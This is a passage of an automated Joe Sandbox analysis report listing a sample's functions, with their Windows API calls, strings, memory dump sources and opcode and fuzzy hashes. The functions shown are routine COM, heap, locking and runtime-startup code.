                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext
                                                                                                                • String ID: /$localserver$sta
                                                                                                                • API String ID: 3213498283-3694077230
                                                                                                                • Opcode ID: a8b02addacd83a943a3e92ddef04de22d194b8f486f2a6b2f03eb39dd6952af5
                                                                                                                • Instruction ID: 039878abd93e49c1574dbdd5e6c195331244f5aa834c9940c94d60a6919c5793
                                                                                                                • Opcode Fuzzy Hash: a8b02addacd83a943a3e92ddef04de22d194b8f486f2a6b2f03eb39dd6952af5
                                                                                                                • Instruction Fuzzy Hash: D471A07AA00616DBCF24DF5984112F9B3F1EFD8758BA4546AE895FB2C0EA708EC1C750
                                                                                                                Function 00E15490 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RoOriginateError.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80040111,?), ref: 00E155D9
                                                                                                                  • Part of subcall function 00E133F9: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E13431
                                                                                                                  • Part of subcall function 00E133F9: DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00E13443
                                                                                                                  • Part of subcall function 00E133F9: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E1346A
                                                                                                                • RoOriginateErrorW.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80070057,00000012,?), ref: 00E15616
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLockOriginateShared$AcquireDecodePointerRelease
                                                                                                                • String ID: ?i$activatibleClassId
                                                                                                                • API String ID: 3068322146-27705284
                                                                                                                • Opcode ID: a1fc1db2f4460dff51c90d9353501a4b6bcbe197e32a6e160886656e60fbdfb2
                                                                                                                • Instruction ID: 201ba0dd5dbf5025ac2e6cc36f9f523bf6f2b2650400443b666918fec0e3f416
                                                                                                                • Opcode Fuzzy Hash: a1fc1db2f4460dff51c90d9353501a4b6bcbe197e32a6e160886656e60fbdfb2
                                                                                                                • Instruction Fuzzy Hash: 7C41CE72A10618EFCB14DF65EC44AEEB7BBFF88710B514015E802B7251DB31AD81CBA0
                                                                                                                Function 00E124E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00E124EB
                                                                                                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00E124F7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                • API String ID: 1646373207-919018592
                                                                                                                • Opcode ID: 74c5670d4f5c2b038e44e7e5b5c6cd562ad531efa8520e686469aefc5f70af7f
                                                                                                                • Instruction ID: cefb22ed7c5a9150cbdb607e60550ea245899a29fb28321ead39ec724b18744a
                                                                                                                • Opcode Fuzzy Hash: 74c5670d4f5c2b038e44e7e5b5c6cd562ad531efa8520e686469aefc5f70af7f
                                                                                                                • Instruction Fuzzy Hash: F7E01D36540329BF8F111FA2DC1CDCF7F2AEB497A17008451FE0972261CA318954D7E1
                                                                                                                Function 00E13306 Relevance: 6.1, APIs: 4, Instructions: 94COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E13381
                                                                                                                • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E1339A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExclusiveLock$AcquireRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 17069307-0
                                                                                                                • Opcode ID: 14dbfe96edfcab6cddf725047507089f6104ba618341aedc4d873e8ff95141f9
                                                                                                                • Instruction ID: 284dae1ee19871f8168bfb56d4f7cab5e2d69251049d9647900ac660cc99d56b
                                                                                                                • Opcode Fuzzy Hash: 14dbfe96edfcab6cddf725047507089f6104ba618341aedc4d873e8ff95141f9
                                                                                                                • Instruction Fuzzy Hash: 5F31B471600124EFCB049F29D898AEDBBA9FF49710B0540A5E817FB361CF34AE41CB95
                                                                                                                Function 00E13FE7 Relevance: 6.1, APIs: 4, Instructions: 55comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000006), ref: 00E14003
                                                                                                                • CLSIDFromString.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 00E14012
                                                                                                                • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,00000000,00000001,00E11970,?,?,?), ref: 00E1402D
                                                                                                                • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 00E1405E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFromInitializeInstanceStringUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2575628211-0
                                                                                                                • Opcode ID: 6ec0fab223c115e797ef2e229384bf05555fdea2a8a6e2eec1441902c075c6e5
                                                                                                                • Instruction ID: 32d42df066c406bf9620e6ff1163f5b5911de789ee1da75c4ac7e6e31abdb6b9
                                                                                                                • Opcode Fuzzy Hash: 6ec0fab223c115e797ef2e229384bf05555fdea2a8a6e2eec1441902c075c6e5
                                                                                                                • Instruction Fuzzy Hash: 71112A71B00228AFD714DF66DC59AEE7BB9EB88710F004059E606F7291CB61A945CBA1
                                                                                                                Function 00E15E80 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00E16598: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E1659F
                                                                                                                • __set_app_type.MSVCRT ref: 00E15E92
                                                                                                                • __p__fmode.MSVCRT ref: 00E15EA8
                                                                                                                • __p__commode.MSVCRT ref: 00E15EB6
                                                                                                                • __setusermatherr.MSVCRT ref: 00E15ED7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1632413811-0
                                                                                                                • Opcode ID: 83c8138221198985e59efc7ebf87528a7e500d5ce9ff777f6703ae9e5e5c725a
                                                                                                                • Instruction ID: 6ce2c7818e36082694cc06c1000cfad17c67a903b4d42d73b17445b8f3ab299d
                                                                                                                • Opcode Fuzzy Hash: 83c8138221198985e59efc7ebf87528a7e500d5ce9ff777f6703ae9e5e5c725a
                                                                                                                • Instruction Fuzzy Hash: 07F0F8B0940305DFDB24AF36B95A5C87BA1B705731B10AA19E462B22F6DF75859CCA10
                                                                                                                Function 00E14751 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118synchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040,?,00000000,00000000), ref: 00E14771
                                                                                                                • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001,?,?,?,?,?,00000000), ref: 00E147A5
                                                                                                                  • Part of subcall function 00E146CA: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,00E12B21,00000000,?,?), ref: 00E146DA
                                                                                                                  • Part of subcall function 00E146CA: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,00E12B21,00000000,?,?), ref: 00E146E9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                                • String ID: Local\SM0:%d:%d:%hs
                                                                                                                • API String ID: 779401067-4162240545
                                                                                                                • Opcode ID: bc53ea6865f5c5c622f4b237accab23d928316c782973ec2270ea25631e7ea3a
                                                                                                                • Instruction ID: 7bfe982f01d6b4b56a04c7459b895583c4738c3f6ebbdfb786928e88ca6d1b87
                                                                                                                • Opcode Fuzzy Hash: bc53ea6865f5c5c622f4b237accab23d928316c782973ec2270ea25631e7ea3a
                                                                                                                • Instruction Fuzzy Hash: 5541C4B1A0113CABCB259B64DC89AEA77A9AF54710F105199F509B7281D7708EC1CBD0
                                                                                                                Function 00E12C6F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00E12CC6
                                                                                                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E12CD2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastOpenSemaphore
                                                                                                                • String ID: _p0
                                                                                                                • API String ID: 1909229842-2437413317
                                                                                                                • Opcode ID: 6a886890aa9fe5dd5d8e717e2f1bee1d4a54209c3190a12b0fd9e265e8a61679
                                                                                                                • Instruction ID: f446f7036098cbf81319f579a2146712e952d788b37fca5966ef82ab257d9d5b
                                                                                                                • Opcode Fuzzy Hash: 6a886890aa9fe5dd5d8e717e2f1bee1d4a54209c3190a12b0fd9e265e8a61679
                                                                                                                • Instruction Fuzzy Hash: 7921D0B12042069FC315EF29D895DEBB7E9EFC8310F11861DFA55A7351DB30DC4686A2
                                                                                                                Function 00E16B60 Relevance: 5.1, APIs: 4, Instructions: 74memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 00E14925
                                                                                                                • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00E14936
                                                                                                                • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00E1495D
                                                                                                                • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00E14964
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorHeapLast$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 1234203156-0
                                                                                                                • Opcode ID: 89c693a36755b01b69df364a9d72b4593fe2429603bcc29170a87a0b98bf5279
                                                                                                                • Instruction ID: 2cd6e41c57560551eba0fec8b109baa6fc2e9fc8249088b573ab66cf824ba75e
                                                                                                                • Opcode Fuzzy Hash: 89c693a36755b01b69df364a9d72b4593fe2429603bcc29170a87a0b98bf5279
                                                                                                                • Instruction Fuzzy Hash: 5E21F3B1500012DFCF15AF61DD94DFEBBA9AFC07093049058F502BA2A6DB309D89DBA1
                                                                                                                Function 00E148B7 Relevance: 5.1, APIs: 4, Instructions: 73memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 00E14925
                                                                                                                • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00E14936
                                                                                                                • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00E1495D
                                                                                                                • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00E14964
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorHeapLast$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 1234203156-0
                                                                                                                • Opcode ID: b5792711dec0e41f9e60222283f9acfdb2353d4a37ee7568e2ee1cab96a9d67a
                                                                                                                • Instruction ID: 5864a64deb1a1ada764ecd432450e23eca62ebdc078c09ffc792830ac1274888
                                                                                                                • Opcode Fuzzy Hash: b5792711dec0e41f9e60222283f9acfdb2353d4a37ee7568e2ee1cab96a9d67a
                                                                                                                • Instruction Fuzzy Hash: A62105B1500012EFCF15AF61DC94DEEBBA8EF817093049054F502BB296DB309E85DBE1
                                                                                                                Function 00E12E62 Relevance: 5.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,?,00E14B2F,?,00000000,00000000,?,?,?,00000000,?), ref: 00E12E80
                                                                                                                • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?,?,?,00E148A0,?,?,?,?,00000000), ref: 00E12E87
                                                                                                                • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00E14B2F,?,00000000,00000000,?,?,?,00000000,?,?,?,00E148A0), ref: 00E12EA5
                                                                                                                • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?,?,?,00E148A0,?,?,?,?,00000000), ref: 00E12EAC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859560861-0
                                                                                                                • Opcode ID: 32e309de457fdd845f259a34b2fa27d1ea42ad896da0c1076cd45fdcd57ea5ce
                                                                                                                • Instruction ID: dadd1b72ee6d15d32a37a4488d19dd308670a1725b3f210d62e15a0ff3d13ad2
                                                                                                                • Opcode Fuzzy Hash: 32e309de457fdd845f259a34b2fa27d1ea42ad896da0c1076cd45fdcd57ea5ce
                                                                                                                • Instruction Fuzzy Hash: 5BF04F72610211AFDB148FA1DC88BA5BBF8FF4C312F11452DF241DA090D775E9A5CBA0